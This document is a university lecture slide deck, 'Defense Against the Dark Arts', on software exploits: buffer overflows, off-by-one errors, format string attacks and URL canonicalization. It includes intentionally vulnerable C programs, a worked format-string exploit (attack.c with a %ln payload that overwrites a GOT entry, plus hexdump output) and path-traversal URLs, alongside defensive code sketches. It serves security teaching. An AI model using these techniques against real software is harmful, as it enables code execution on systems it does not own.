<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>DADA: Exploits</title>
<link rel="stylesheet" href="reveal.js/css/reveal.css">
<link rel="stylesheet" href="reveal.js/css/theme/black.css">
<link rel="stylesheet" href="dada.css">
<!-- Theme used for syntax highlighting of code -->
<link rel="stylesheet" href="reveal.js/lib/css/zenburn.css">
<!-- Printing and PDF exports -->
<script>
var link = document.createElement( 'link' );
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = window.location.search.match( /print-pdf/gi ) ? 'css/print/pdf.css' : 'css/print/paper.css';
document.getElementsByTagName( 'head' )[0].appendChild( link );
</script>
</head>
<body>
<div class="reveal">
<div class="slides">
<section data-markdown id="cover"><script type="text/template">
# CS 4630
### Defense Against the Dark Arts
<center><small>[Aaron Bloomfield](http://www.cs.virginia.edu/~asb) / [[email protected]](mailto:[email protected]) / [@bloomfieldaaron](http://twitter.com/bloomfieldaaron)</small></center>
<center><small>Repository: [github.com/aaronbloomfield/dada](http://github.com/aaronbloomfield/dada) / [↑](index.html) / <a href="?print-pdf"><img class="print" width="20" src="images/print-icon.png"></a></small></center>
## Exploits
</script></section>
<section data-markdown><textarea data-template>
# Contents
[1st Generation Exploits](#/firstgen)
[2nd Generation Exploits](#/secondgen)
[3rd Generation Exploits](#/thirdgen)
[Miscellaneous Vulnerabilities](#/miscvul)
[Safe and Unsafe Coding](#/safeandunsafe)
[Defenses](#/defenses)
</textarea></section>
<section>
<section data-markdown id="firstgen"><textarea data-template>
# 1st Generation Exploits
</textarea></section>
<section data-markdown data-separator="^\n$"><textarea data-template>
## Vulnerabilities and Exploits
- *Vulnerability* is often used to refer only to vulnerable code in an OS or applications
- More generally, a vulnerability is whatever weakness in an overall system makes it open to attack
- An attack that was designed to target a known vulnerability is an *exploit* of that vulnerability
## Varieties of Vulnerabilities
- Buffer overflow on stack
- Primarily used to overwrite the return address
- Buffer overflow on heap
- Return addresses are not on the heap
- Other pointers are on the heap and can be overwritten, e.g. function & file pointers
- Format string attacks
- Memory management attacks
- Failure to validate input
- URL encoding failures; ... the list goes on
## Classifying Vulnerabilities
- Szor classifies vulnerabilities and exploits by generation
- First generation: Stack buffer overflow
- Second generation:
- Off by one overflows, heap overflows, file pointer overwriting, function pointer overwriting
- Third generation
- Format string attacks, memory (heap) management attacks
- ... the list is lengthy
## First Generation Exploits
- *Buffer overflow* is the most common exploit
- Array bounds not usually checked at run time
- What comes *after* the buffer being overflowed determines what can be attacked
- The return address is on the stack at a known offset after the last local variable
- Return address can be changed to cause a return to malicious code
- Buffer overflows are easy to guard against, yet they remain the most common code vulnerability
## Stack Buffer Overflow Example
```
void bogus(void) {
    int i;
    char buffer[256];      // Return address follows!
    printf("Enter your data as a string.\n");
    scanf("%s", buffer);   // No bounds check!
    process_data(buffer);
    return;
    // Returns to the return address that follows
    // buffer[] on the stack frame
}
```
## Stack Buffer Overflow cont'd
<!-- .slide: class="right-float-img-1000" -->
![stack diagram](images/exploits/stack-buffer-overflow-1.png)
In the stack frame for `bogus()`, the return address is right above the saved frame pointer, which is right above the 256-byte `buffer[]`
In the 64-bit calling convention, there (usually) is no saved frame pointer
## Stack Buffer Overflow cont'd.
- Notice that the program does not check that the user inputs 255 characters or fewer
- Source code is available for many operating systems and applications (or, they can be reverse engineered)
- Attacker can see that it is possible to overflow the buffer
- Buffer is last data item on the stack frame; the return address from this function will be at a defined distance after it
## Stack Buffer Overflow cont'd.
- Attacker can enter a character string representation of his malicious object code, long enough to fill the buffer
- At the end of the malicious code, the attacker passes the address of variable "buffer" so that it overwrites the return address of function `bogus()` on the stack frame
- When `bogus()` returns, it will cause a return to the buffer address, executing the malicious code in it
## Stack Buffer Overflow cont'd.
<!-- .slide: class="right-float-img-1000" -->
![stack diagram](images/exploits/stack-buffer-overflow-2.png)
`bogus()` is now "returning" to `buffer[0]`
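## Stack Buffer Overflow: Bounded Input (Sketch)
One way to close the hole in `bogus()` is to read with an explicit size limit. This is a minimal sketch, not the course's code: `read_line_bounded()` is a hypothetical helper built on the standard `fgets()`, which never stores more than `size - 1` characters.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not part of the course code): read one line from
 * `in` into `buf`, storing at most `size - 1` characters plus the
 * terminating NUL. Excess input on the line is discarded.
 * Returns the number of characters stored, or -1 on EOF/error. */
long read_line_bounded(FILE *in, char *buf, size_t size) {
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';          /* whole line fit: strip the newline */
    } else {
        int ch;                     /* line was too long: drop the rest */
        while ((ch = getc(in)) != EOF && ch != '\n')
            ;
    }
    return (long)len;
}
```

`bogus()` could then call `read_line_bounded(stdin, buffer, sizeof buffer)` in place of the unbounded `scanf("%s", buffer)`.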
</textarea></section>
</section>
<section>
<section data-markdown id="secondgen"><textarea data-template>
# 2nd Generation Exploits
</textarea></section>
<section data-markdown data-separator="^\n$"><textarea data-template>
## Heap Buffer Overflow
- Example: overwriting a file pointer
```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv) {
    int ch = 0, i = 0;
    FILE *f = NULL;
    static char buffer[16], *szFileName = "C:\\harmless.txt";
    ch = getchar();
    while (ch != EOF) {  /* User input can overflow buffer[] */
        buffer[i++] = ch;
        ch = getchar();
    }
    f = fopen(szFileName, "w+b");  /* might be modified! */
    fputs(buffer, f);
    fclose(f);
    return 0;
}
```
## Heap Buffer Overflow
- Examine the key lines of the example code:
```
static char buffer[16], *szFileName =
    "C:\\harmless.txt";
```
- Both variables are static, so they are placed in the global data area (treated here as part of the heap) rather than on the stack, and will typically be adjacent in memory
- When `buffer[]` is overflowed with keyboard input, it will overwrite `szFileName`:
```
while (ch != EOF) {  // User input can overflow buffer
    buffer[i++] = ch;
    ch = getchar();
}
```
## Heap Buffer Overflow
- An attacker who can compile the code and dump it to figure out addresses can now make `szFileName` point anywhere he wants
- For example, he could make it point to `argv[1]`; this means he can pass in a file name on the command line!
- So, the attacker passes in `C:\autoexec.bat` or some other protected system file name on the command line; if this program is a system utility that runs with admin privileges, the system file can be overwritten
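## Heap Buffer Overflow: Modeling the Overwrite (Sketch)
To see why adjacency matters, this sketch models the two static variables as one struct and copies attacker-chosen bytes across it. The struct, `unchecked_fill()`, and `build_input()` are hypothetical names used only for illustration. A real compiler is not obliged to place separate variables next to each other, and the real attack relies on undefined behavior that this model deliberately avoids.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical model of the two adjacent static variables. A struct is
 * used only so that the adjacency is well defined. */
struct layout {
    char buffer[16];
    const char *file_name;
};

/* Copy `len` attacker-controlled bytes over the start of the whole
 * object, the way an unchecked write through buffer[] would.
 * The copy is clamped to the struct so the demo itself stays in bounds. */
void unchecked_fill(struct layout *m, const unsigned char *input, size_t len) {
    if (len > sizeof *m)
        len = sizeof *m;
    memcpy(m, input, len);
}

/* Build the attacker's input: filler up to the pointer, then the bytes
 * of a pointer to a different file name. `out` must hold at least
 * sizeof(struct layout) bytes. Returns the input length. */
size_t build_input(unsigned char *out, const char *new_name) {
    size_t off = offsetof(struct layout, file_name);
    memset(out, 'A', off);
    memcpy(out + off, &new_name, sizeof new_name);
    return off + sizeof new_name;
}
```

After `unchecked_fill()` runs on such input, `file_name` no longer points at the harmless name, which is the effect the slides describe for `szFileName`.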
## Off by One Attack
- The C language starts array indices at zero, which is not always intuitive for beginning programmers
- This often leads to off-by-one errors in code that fills a buffer
```
void vuln(char *foobar) {
    int i;
    char buffer[512];
    for (i = 0; i <= 512; ++i)  // Should be <, not <=
        buffer[i] = foobar[i];
}
int main(int argc, char *argv[]) {
    if (2 == argc)
        vuln(argv[1]);
    return 0;
}
```
## Off by One Attack
- How much damage could a one-byte exploit cause?
- The return address is NOT located just past the local variables on the x86 stack frame
- There is a saved EBP location between them (the frame pointer)
- The attacker cannot directly alter the return address
- S/he *can* alter the last byte of the saved EBP
## Off by One Attack
- When the vulnerable function returns, the calling function will now have a bogus stack frame
- This bogus stack frame can be arranged to lie within the buffer that was partly filled with malicious code
- When the caller of the vulnerable function returns, it will return into the start of the malicious code section of the buffer
## Off by One Stack Frame
- The caller of the vulnerable function ends up returning to a fake return address (inside buffer):
- 512 bytes of `buffer[]` received malicious code, plus a bogus stack frame, from the keyboard, as hex strings
- Byte 513 from the keyboard was the new lowest byte of the valid saved EBP
- Lowest because the x86 is little-Endian
- Thus making the caller's stack frame be inside `buffer[]`
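## Off by One: Why One Byte Is Enough (Sketch)
The point about little-endian byte order can be checked in isolation. This sketch assumes a 32-bit saved frame pointer; the function names are hypothetical, and any saved EBP value passed in is a made-up example.

```c
#include <stdint.h>
#include <string.h>

/* Returns 1 when the lowest-addressed byte of an integer is its least
 * significant byte (little-endian, as on x86). */
int is_little_endian(void) {
    uint32_t probe = 1;
    unsigned char first;
    memcpy(&first, &probe, 1);
    return first == 1;
}

/* Model of the one-byte overflow: overwrite only the byte stored at the
 * lowest address of a saved 32-bit frame pointer value. */
uint32_t overwrite_first_byte(uint32_t saved_ebp, unsigned char b) {
    memcpy(&saved_ebp, &b, 1);
    return saved_ebp;
}
```

On a little-endian machine only the low 8 bits change, so the forged frame pointer stays within 255 bytes of the real one, close enough to land inside a 512-byte buffer just below it.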
## Off by One Stack Frame
<!-- .slide: class="max-image-height-500" -->
![off by one attack](images/exploits/off-by-one.png)
## Off by One: Real Examples
- [Nestea IP frame off-by-one denial of service attack](http://www.insecure.org/sploits/linux.PalmOS.nestea.html)
- [Linux fileutils "ls" command off-by-one memory exhaustion attack (system crashes)](http://www.linuxsecurity.com/content/view/105485/105/) (registration required)
- [Middleman printer proxy server Linux attack](http://www.linuxdevcenter.com/pub/a/linux/2003/01/13/insecurities.html#mid)
## Function Pointer Overwriting
- A system utility could have a function pointer to a callback function, declared after a buffer (Szor, Listing 10.5)
- Overflowing the buffer overwrites the function pointer
- By determining the address of system() on this machine, an attacker can cause system() to be called instead of the callback function
- [Macromedia Flash example](http://www.securiteam.com/windowsntfocus/6W00J00EKQ.html)
</textarea></section>
</section>
<section>
<section data-markdown id="thirdgen"><textarea data-template>
# 3rd Generation Exploits
</textarea></section>
<section data-markdown data-separator="^\n$"><textarea data-template>
## Format String Attacks
- Many C library functions produce formatted output using format strings
- e.g. `printf()`, `fprintf()`, `wprintf()`, `sprintf()`, etc.
- These functions permit strings that have no format control to be printed (unfortunately):
```
char buffer[] = "Hello, world!"; /* [13] would leave no room for the NUL */
printf(buffer); /* Bad programmer! */
printf("%s", buffer); /* Good programmer! */
```
## Format String Attacks
- Consider:
```
char buffer[] = "Hello, world!";
printf(buffer); /* Bad programmer! */
```
- The format string (1st parameter to `printf()`) is not a fixed string
- This non-standard approach creates the possibility that an attacker will pass a format string rather than a string to print, which can be used to write to memory
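## Format String Attacks: The Safe Form (Sketch)
The fix is to keep untrusted text in the argument list and out of the format position. The two helpers here are hypothetical wrappers around standard calls, shown only to make the rule concrete.

```c
#include <stdio.h>

/* Hypothetical helper: format untrusted text into `out` without ever
 * using it as the format string. Returns what snprintf() returns. */
int format_untrusted(char *out, size_t size, const char *untrusted) {
    return snprintf(out, size, "%s", untrusted);
}

/* Hypothetical helper: print untrusted text to a stream. fputs() does
 * not interpret '%' at all, so no format string is involved. */
int print_untrusted(FILE *stream, const char *untrusted) {
    return fputs(untrusted, stream);
}
```

With either helper, input such as `%x%x%n` is copied through literally instead of being interpreted.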
## Format String Attack Example
Source code: [vuln.c](code/exploits/vuln.c) ([html](code/exploits/vuln.c.html))
```
#include <stdio.h>
#include <string.h>

void vuln(char buffer[256]) {
    printf(buffer);
    /* Bad; good would be: printf("%s",buffer) */
}
int main(int argc, char *argv[]) {
    char buffer[256] = "";  /* allocate buffer */
    if (2 == argc)          /* copy command line */
        strncpy(buffer, argv[1], 255);
    vuln(buffer);
    return 0;
}
```
- The included [Makefile](code/exploits/Makefile) compiles this to `vuln-32bit.exe` and `vuln-64bit.exe`
- What if the user passes `%x` on the command line?
## Format String Attack Example
- For sanity's sake, we will probably want to run it via:
```
setarch x86_64 -v -LR vuln-32bit.exe
setarch x86_64 -v -LR vuln-64bit.exe
```
- This isn't necessary, but it will make our lives easier
- Since the addresses will be the same each time we run it
- And when run on the Ubuntu 16.04 VirtualBox image, your execution will match the examples in this slide set
## Format String Attack Example
- If the user passes `%x` on the command line, then `printf()` will receive a pointer to a string with `"%x"` in it on the stack
- `printf()` will see the `%x` and assume there is another parameter above it on the stack
- Whatever is above it on the stack will be printed in hexadecimal
- Difference between correct and incorrect uses of `printf()` is seen in next diagram
## Example: Uses of printf()
- Immediately after the call to `printf()`, but before the prologue code in `printf()`:
![format string attack](images/exploits/format-string-attack-1.png)
- This is the 32-bit version
## Example: Uses of printf()
- For the 64-bit version:
- The return addresses are still on the stack
- 0x4005f3 from `printf()` to `vuln()`
- 0x40067c from `vuln()` to `main()`
- The parameters are in registers (rdi for the first, rsi for the second, etc.)
- Note that, in both cases, there may be other values between the stack values shown
## Format String Attack Example
- In the bad code, whatever is above `%x` on the stack will be printed in hexadecimal
- Attacker can use `%x%x%x`, etc., to display the stack contents and figure out return addresses
- An attacker who can use an interactive utility can determine the exact address where his malicious code will be placed, where the return address is, and therefore what value to use to overwrite the return address
## Positioning Within the Stack
- If an attacker wants to skip over 32 bytes in the stack, he can supply 8 `%x` fields in the format string on the command line:
```
vuln-32bit.exe %x%x%x%x%x%x%x%x%s
vuln-64bit.exe %x%x%x%x%x%x%x%x%s
```
- The format string causes 8 ints to be printed off the stack in hex, using the `%x` specifiers, then prints a string (using `%s`) starting at the next stack position
## Positioning Within the Stack
- Some better formatting tips:
- One can use `%.8x` to ensure all values are printed with 8 digits
- Or `%.16lx` for the 64-bit version
- And put commas between
- To print 6 hex values:
```
vuln-32bit.exe %.8x,%.8x,%.8x,%.8x,%.8x,%.8x
vuln-64bit.exe %.16lx,%.16lx,%.16lx,%.16lx,%.16lx,%.16lx
```
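## Positioning Within the Stack: Building the String (Sketch)
Typing long runs of specifiers by hand is error-prone, so they can be generated. `build_probe()` is a hypothetical helper, not part of the course code; it only concatenates text.

```c
#include <string.h>

/* Hypothetical helper: write `fields` copies of `spec` (for example
 * "%.8x" or "%.16lx") into `out`, separated by commas.
 * Returns 0 on success, -1 if `out` is too small. */
int build_probe(char *out, size_t size, const char *spec, int fields) {
    size_t spec_len = strlen(spec);
    size_t used = 0;
    if (size == 0)
        return -1;
    for (int i = 0; i < fields; ++i) {
        size_t need = spec_len + (i > 0 ? 1 : 0);
        if (used + need + 1 > size)
            return -1;               /* no room for text plus NUL */
        if (i > 0)
            out[used++] = ',';
        memcpy(out + used, spec, spec_len);
        used += spec_len;
    }
    out[used] = '\0';
    return 0;
}
```

For instance, `build_probe(p, sizeof p, "%.8x", 6)` produces the six-field 32-bit argument from the slide above.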
## Overwriting Within the Stack
- The format string can also be used to force `printf()` to write to memory via `%n`:
```
printf("foobar%n", &nBytesWritten);
```
- This prints "foobar", writes 6 to `nBytesWritten`
- We can also use `%hn` for a short, or `%ln` for a long
- Attacker can supply address to write to:
```
vuln-32bit.exe 0x12FE7C%x%x%n
```
- We'll see how this works next...
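## `%n` in Isolation (Sketch)
The behavior of `%n` and `%hn` can be confirmed with a literal format string, which is the legitimate use. This sketch assumes a C library that still supports `%n`; some platforms restrict or disable it. The function names are hypothetical.

```c
#include <stdio.h>

/* Returns the count that %n stores after "foobar" has been produced. */
int count_after_foobar(void) {
    char out[16];
    int written = -1;
    snprintf(out, sizeof out, "foobar%n", &written);
    return written;
}

/* Same idea with %hn, which stores the count into a short. */
short count_after_foobar_short(void) {
    char out[16];
    short written = -1;
    snprintf(out, sizeof out, "foobar%hn", &written);
    return written;
}
```

The danger arises only when the attacker, not the programmer, chooses both the format string and the pointer that `%n` consumes.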
## A vulnerability
Consider the [exploitable.c](code/exploits/exploitable.c) ([html](code/exploits/exploitable.c.html)) code:
```
#include <stdio.h>
#include <stdlib.h>

int exploited() {
    printf("Got here!\n");
    exit(0);
}
int main(void) {
    char buffer[100];
    while (fgets(buffer, sizeof buffer, stdin)) {
        printf(buffer);
    }
    return 0;
}
```
- Can we supply a string such that `exploited()` will be called?
## Where are we going? And why are we in this handbasket?
- First, we need to get the address of `fgets()` and also `exploited()`
- We want to change a call to `fgets()` to be a call to `exploited()`
- We can get that through `objdump`
## `objdump -d exploitable.exe`
<pre class="code">
exploitable.exe: file format elf64-x86-64
Disassembly of section .init:
...
0000000000400580 < fgets@plt >:
400580: ff 25 b2 0a 20 00 jmpq *0x200ab2(%rip) # <span class='red'>601038</span> <_GLOBAL_OFFSET_TABLE_+0x38>
400586: 68 04 00 00 00 pushq $0x4
40058b: e9 a0 ff ff ff jmpq 400530 <_init+0x20>
0000000000<span class='red'>4006a6</span> < exploited >:
4006a6: 55 push %rbp
...
</pre>
- The address of `exploited()` is 0x4006a6
- The address of the pointer to `fgets()` is 0x601038
- Scroll the code window to the right to see this
## A bit more background
- `exploited()` address 0x4006a6 is 4,196,006 in decimal
- Recall that parameter 1 will be in rdi, and it will be a pointer to the buffer
- 1 character specifiers, such as `%c`, still "read" in 8 bytes on the stack, but print out one character
## Faking printf() parameters
![format string attack](images/exploits/format-string-attack-2.png)
## Creating the exploit
- The goal:
- Have 5 specifiers to "burn" the values in the registers
- Generate the address for `exploited()` by printing 0x4006a6 = 4,196,006 bytes to stdout (!)
- Overwrite the `fgets()` address by writing that value to the address of 0x601038
- Our format string will contain:
- A whole bunch of specifiers
- The address, in hex, of the pointer to `fgets()`: 0x601038
## Parts of the puzzle
- To "burn" the five registers, we'll print them as characters:
```
%c%c%c%c%c
```
- To print many characters, we'll use an unsigned int specifier with a large number of digits
```
%.4196006u
```
- (that number will change slightly)
- Once we've printed out 4 MB of characters, we can write that number as a pointer to memory
## The result
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c</span><span class="coral">%.4195998u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span><span class="palevioletred">0x601038</span>
</pre>
- <span class="springgreen">%c%c%c%c%c</span> "burns" the registers
- <span class="darkkhaki">%c%c%c</span> moves forward 3 "spots" (24 bytes)
- <span class="coral">%.4195998u</span> writes most of the 4 MB of characters
- <span class="darkgray">%ln</span> writes the value to memory
- <span class="lightskyblue">???</span> aligns the text so far to 32 bytes
- <span class="palevioletred">0x601038</span> is the address to write to
- It's provided as binary, not the text shown
## Analysis
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c</span><span class="coral">%.4195998u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span><span class="palevioletred">0x601038</span>
</pre>
- Total bytes written to stdout:
- 5 from <span class="springgreen">%c%c%c%c%c</span>
- 3 from <span class="darkkhaki">%c%c%c</span>
- 4,195,998 from <span class="coral">%.4195998u</span>
- Total is 4,196,006
- In hex, that's 0x4006a6
- This is the value written by <span class="darkgray">%ln</span> as an 8-byte value
- Since <span class="darkgray">%ln</span> writes as a `long`
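## Analysis: Checking the Arithmetic (Sketch)
The width in the padded field is just the target value minus the characters already printed. The helper names here are hypothetical; the numbers in the usage note come from the slides above.

```c
#include <stdio.h>

/* Width needed for the padded %u field so that the running output count
 * equals `target` when %ln is reached. `already` is the number of
 * characters the earlier specifiers print. Returns 0 if `target` has
 * already been passed. */
unsigned long padding_width(unsigned long target, unsigned long already) {
    return target > already ? target - already : 0;
}

/* Write the padded specifier, e.g. "%.4195998u", into `out`.
 * Returns what snprintf() returns. */
int format_padding_spec(char *out, size_t size, unsigned long width) {
    return snprintf(out, size, "%%.%luu", width);
}
```

With a target of 0x4006a6 and 8 characters from the eight `%c` fields, `padding_width()` gives 4,195,998, matching the specifier in the exploit string.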
## Analysis
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c</span><span class="coral">%.4195998u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span><span class="palevioletred">0x601038</span>
</pre>
- How does <span class="darkgray">%ln</span> get the address?
- `printf()` sees 4 "values" on the stack (after burning the registers):
- The 1st <span class="darkkhaki">%c</span> reads the first 8 bytes: <span class="springgreen">%c%c%c%c</span>
- The 2nd <span class="darkkhaki">%c</span> reads the next 8 bytes: <span class="springgreen">%c</span><span class="darkkhaki">%c%c%c</span>
- The 3rd <span class="darkkhaki">%c</span> reads the next 8 bytes: <span class="coral">%.419599</span>
- The <span class="coral">%.4195998u</span> reads the next 8 bytes: <span class="coral">8u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span> (and interprets it as an unsigned)
- Thus, when it's time to find the address for <span class="darkgray">%ln</span>, what is read is <span class="palevioletred">0x601038</span>
## The result
Consider the [attack.c](code/exploits/attack.c) ([html](code/exploits/attack.c.html)) code:
```
#include <stdio.h>
int main() {
    /* advance through 5 registers, then 4 * 8 = 32 bytes
     * down stack, outputting 4195998 + 8 characters
     * before using %ln to store a long. Then pad that
     * to 32 bytes of text. */
    fputs("%c%c%c%c%c%c%c%c%.4195998u%ln???", stdout);
    /* write pointer value, which will include \0s */
    void *ptr = (void*) 0x601038;
    fwrite(&ptr, 1, sizeof(ptr), stdout);
    fputs("\n", stdout);
    return 0;
}
```
- Note that we have to use `fwrite()`, since we are writing binary data
## Output analysis
<pre class="codesmall">
$ ./exploitable.exe < attack.out > exploitable.out
$ hexdump -C exploitable.out
00000000 39 90 0a 39 38 25 25 25 30 30 30 30 30 30 30 30 |9..98%%%00000000|
00000010 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|
*
00400690 30 30 30 30 30 30 30 30 30 30 30 30 31 38 31 34 |0000000000001814|
004006a0 33 39 34 31 36 38 3f 3f 3f 38 10 60 47 6f 74 20 |394168???8.`Got |
004006b0 68 65 72 65 21 0a |here!.|
004006b6
$
</pre>
- The first 5 bytes are the parameter registers as chars
- The next three bytes are pieces of the format string, printed as chars
- The next 4,195,998 bytes are the end of the format string interpreted as an unsigned
- The value is 1,814,394,168, with a *lot* of leading 0's
- Note that hexdump removes most of the 0's from this output display
## Output analysis
<pre class="codesmall">
$ ./exploitable.exe < attack.out > exploitable.out
$ hexdump -C exploitable.out
00000000 39 90 0a 39 38 25 25 25 30 30 30 30 30 30 30 30 |9..98%%%00000000|
00000010 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|
*
00400690 30 30 30 30 30 30 30 30 30 30 30 30 31 38 31 34 |0000000000001814|
004006a0 33 39 34 31 36 38 3f 3f 3f 38 10 60 47 6f 74 20 |394168???8.`Got |
004006b0 68 65 72 65 21 0a |here!.|
004006b6
$
</pre>
- The next three ?'s are the padding from the source code
- The address, in binary, is printed next, as 3 characters (0x601038)
- The end of the output is the "Got here!\n" from the `exploited()` function
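## Output analysis: Where 1,814,394,168 Comes From (Sketch)
The padded `%u` field consumed the stack slot holding the text `8u%ln???` and printed its low four bytes as a number. This can be reproduced by hand; `le32_from_bytes()` is a hypothetical helper that spells out the little-endian interpretation.

```c
#include <stdint.h>

/* Interpret the first four bytes at `p` as a little-endian 32-bit
 * unsigned value, which is how x86-64 reads an `unsigned` argument from
 * an 8-byte stack slot. */
uint32_t le32_from_bytes(const char *p) {
    const unsigned char *b = (const unsigned char *)p;
    return (uint32_t)b[0]
         | ((uint32_t)b[1] << 8)
         | ((uint32_t)b[2] << 16)
         | ((uint32_t)b[3] << 24);
}
```

The bytes `8`, `u`, `%`, `l` are 0x38, 0x75, 0x25, 0x6c, giving 0x6c257538, which is 1,814,394,168 in decimal.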
## Writing an Arbitrary Value
- Some modern C libraries do not permit huge width specifiers, so 0x601038 cannot always be written using a single `%n` field
- An attacker can work around this defense by writing 0x601038 as three separate bytes: 0x60, 0x10, and 0x38, to three consecutive byte locations that overwrite the old return address, using three `%n` fields on the command line
- Only works on a machine such as the x86 that permits unaligned byte stores to memory
## Example
- We want to:
- Write 1000 (short) (equals 0x3e8) to address 0x1234567890ABCDEF
- Write 2000 (short) (equals 0x7d0) to address 0x1234567890ABCDF1
- We "know" that the buffer starts 16 bytes above `printf()` return address
- The result:
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c%c%.991u</span><span class="coral">%hn</span><span class="darkgray">%.1000u</span><span class="lightskyblue">%hn</span>
</pre>
## Example
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c%c%.991u</span><span class="coral">%hn</span><span class="darkgray">%.1000u</span><span class="lightskyblue">%hn</span>
</pre>
- <span class="springgreen">%c%c%c%c%c</span>: skip over registers
- <span class="darkkhaki">%c%c%c%c%.991u</span>: skip to format string buffer, past format part
- 9 + 991 chars is 1000
- <span class="coral">%hn</span>: write to first pointer
- <span class="darkgray">%.1000u</span>: 1000 + 1000 = 2000
- <span class="lightskyblue">%hn</span>: write to second pointer
- (note that we haven't shown the rest of the format string, which would contain the addresses for the two <span class="coral">%hn</span> specifiers)
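## Example: Computing the Padding (Sketch)
Each `%hn` stores only the low 16 bits of the running count, so the padding before each write is a difference modulo 65536. `next_hn_padding()` is a hypothetical helper; it ignores the corner case where the needed padding is smaller than the number of digits the padded value actually prints.

```c
/* Number of extra characters to print before a %hn so that the low
 * 16 bits of the running output count equal `target`. `printed` is the
 * count so far. The result wraps modulo 65536 because %hn stores only a
 * short. */
unsigned next_hn_padding(unsigned long printed, unsigned short target) {
    return (unsigned)((target - (printed & 0xFFFFu)) & 0xFFFFu);
}
```

Starting from 9 characters, reaching 1000 needs 991 more, and going from 1000 to 2000 needs another 1000, as in the format string above. Writing a smaller value after a larger one still works, because the count simply wraps around.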
## Heap Management
- A heap allocation (e.g. via `malloc()`) allocates a small control block, with pointer and size fields, just before the memory that is allocated
- An attacker can underflow the heap memory allocated (in the absence of proper bounds checking, or with pointer arithmetic) and overwrite the control block
- The heap management software will now use the overwritten memory pointer info in the control block, and can thus be redirected to write to arbitrary memory addresses
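## Heap Management: A Toy Control Block (Sketch)
The layout described above can be pictured with a toy allocator that stores its bookkeeping just before the payload. Everything here is hypothetical and far simpler than a real `malloc()` implementation; it only shows why bytes at negative offsets from the returned pointer are sensitive.

```c
#include <stdlib.h>

/* Toy control block; real allocators use different, more complex
 * layouts. */
struct block_header {
    size_t size;                 /* payload size in bytes */
    struct block_header *next;   /* next block in the allocator's list */
};

/* Allocate `size` payload bytes with a header placed just before them. */
void *toy_alloc(size_t size) {
    struct block_header *h = malloc(sizeof *h + size);
    if (h == NULL)
        return NULL;
    h->size = size;
    h->next = NULL;
    return h + 1;                /* payload starts right after the header */
}

/* Recover the header from a payload pointer, as a free routine would. */
struct block_header *header_of(void *payload) {
    return (struct block_header *)payload - 1;
}

void toy_free(void *payload) {
    if (payload != NULL)
        free(header_of(payload));
}
```

A write that underflows the payload lands in `size` and `next`, and the allocator will trust whatever values it later finds there.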
## Input Validation Failures
- There are numerous ways in which an application program can fail to validate user input
- We will examine the two failures that are most important in the Internet age:
- URL encoding and canonicalization
- MIME header parsing
## URL Encoding and Canonicalization
- The following URLs represent the same image file:
- http://domain.tld/user/foo.gif
- http://domain.tld/user/bar/../foo.gif
- Canonicalization converts URLs into a standard form
- The 2nd URL above would be converted to the 1st
- Szor, p. 385: "A URL canonicalization vulnerability occurs when a security decision is based on a URL and not all of the URL representations are taken into account."
## URL Encoding and Canonicalization
- Suppose a web server only allows external access to the /user subdirectories, but does not canonicalize URLs before checking them:
- http://domain.tld/user/index.html (legal)
- http://domain.tld/passwords.txt (illegal)
- http://domain.tld/user/../passwords.txt (canonicalization exploit)
- After many such exploits, server software began searching for ".." and converting URLs to canonical form
- However, character encoding permitted canonicalization exploits to continue
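## Canonicalize, Then Check (Sketch)
The defense is to make the security decision on the canonical path only. This is a minimal sketch under stated assumptions: the input is an absolute path that has already been fully decoded, and `canonicalize_path()` and `is_under_user()` are hypothetical names, not any server's API.

```c
#include <string.h>

/* Resolve "." and ".." segments in an absolute path such as
 * "/user/../passwords.txt". Writes the result to `out`.
 * Returns 0 on success, -1 if the path is not absolute, tries to climb
 * above the root, or does not fit in `out`. */
int canonicalize_path(const char *path, char *out, size_t size) {
    size_t len = 0;
    if (path[0] != '/' || size < 2)
        return -1;
    while (*path != '\0') {
        while (*path == '/')
            ++path;                          /* skip separators */
        size_t seg = strcspn(path, "/");
        if (seg == 0)
            break;
        if (seg == 1 && path[0] == '.') {
            /* "." names the current directory: nothing to do */
        } else if (seg == 2 && path[0] == '.' && path[1] == '.') {
            if (len == 0)
                return -1;                   /* ".." above the root */
            while (len > 0 && out[--len] != '/')
                ;                            /* drop the last segment */
        } else {
            if (len + 1 + seg + 1 > size)
                return -1;
            out[len++] = '/';
            memcpy(out + len, path, seg);
            len += seg;
        }
        path += seg;
    }
    if (len == 0)
        out[len++] = '/';
    out[len] = '\0';
    return 0;
}

/* The access check runs on the canonical form, never on the raw path. */
int is_under_user(const char *path) {
    char canon[256];
    return canonicalize_path(path, canon, sizeof canon) == 0
        && strncmp(canon, "/user/", 6) == 0;
}
```

Here `/user/../passwords.txt` canonicalizes to `/passwords.txt` and is rejected, while `/user/bar/../foo.gif` becomes `/user/foo.gif` and is allowed.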
## URL Character Encoding
- Most web servers accept percent-encoded UTF-8 in URLs; e.g. `%2F` represents a forward slash
- Encoding rules:
- 0-7 bits: input `xxxxxxx` becomes `0xxxxxxx`
- 8-11 bits: input `xxxxxxxxxxx` becomes `110xxxxx 10xxxxxx`
- 12-16 bits: input `xxxx...xxxx` becomes `1110xxxx 10xxxxxx 10xxxxxx`
- 17-21 bits: input `xxxx...xxxxx` becomes `11110xxx 10xxxxxx 10xxxxxx 10xxxxxx`
## URL Character Encoding
